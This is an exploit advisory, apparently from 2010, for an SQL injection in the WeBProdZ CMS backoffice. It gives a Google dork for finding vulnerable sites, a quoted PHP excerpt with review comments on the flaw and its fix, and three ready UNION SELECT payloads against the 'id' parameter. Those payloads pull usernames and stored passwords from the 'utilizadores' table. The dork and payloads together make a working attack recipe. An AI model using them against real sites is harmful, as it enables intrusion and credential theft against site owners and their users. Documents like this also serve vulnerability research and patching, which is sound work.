_______ _ _
| ___ \| | | | (_)
| |_/ /_____ _____ | |_ _| |_ _____ __
|// _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
| |\ \__/\ V / (_) | | |_| | |_| | (_) | | | |
\_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|
_______________
|_ _||_||_|
| | _____ _ _ __ ___ | |/' || |_| |
| |/ _ \/ _` | '_ ` _ \|/| |\____ |
| |__/ (_| | | | | | | \ |_/ /.___/ /
\_/\___|\__,_|_| |_| |_|\___/ \____/
_____________________________________________________________
[$] Exploit Title : WeBProdZ CMS SQL Injection Vulnerability
[$] Date: 06-05-2010
[$] Author: MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : SQL Injection Vulnerability
[$] Google Dork : "Desenvolvido por WeBProdZ"
[$] Vulnerable code in /backoffice/textos/editar.php
<?php
// Excerpt of /backoffice/textos/editar.php as quoted by the advisory: it loads
// one row of the `textos` table, selected by the `id` query-string parameter.
// NOTE(review): no session or authorization check is visible in this excerpt
// before the query runs; whether connDB.php enforces one cannot be told from here.
include_once("../../ligacao/connDB.php");
// VULNERABLE (SQL injection, CWE-89): $_GET["id"] is concatenated into the
// statement unquoted and unvalidated, so the request controls the SQL text.
// Fix: reject anything that is not an integer id (for example with
// filter_var($_GET["id"], FILTER_VALIDATE_INT)) and bind the value through a
// prepared statement (PDO or mysqli) instead of building the query as a string.
$sql = "select * from textos where idtextos=".$_GET["id"];
// The legacy mysql_* extension offers no prepared statements and was removed in
// PHP 7.0. The result is not checked, so a failed query hands `false` onward.
$j2 = mysql_query($sql);
// Takes the first result row as an object. With an injected UNION that row is
// whatever the appended SELECT returned, not a `textos` record.
// NOTE(review): the payloads listed below read `password` and `password_ori`
// from `utilizadores`; presumably credentials are stored in recoverable form.
// Confirm, then migrate to password_hash() and rotate the exposed passwords.
$o=mysql_fetch_object($j2);
?>
[$] Exploit
[+] http://[site]/backoffice/textos/editar.php?id=1 <- SQL injection point (the id parameter)
[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--
[$] Greetings from PORTUGAL ^^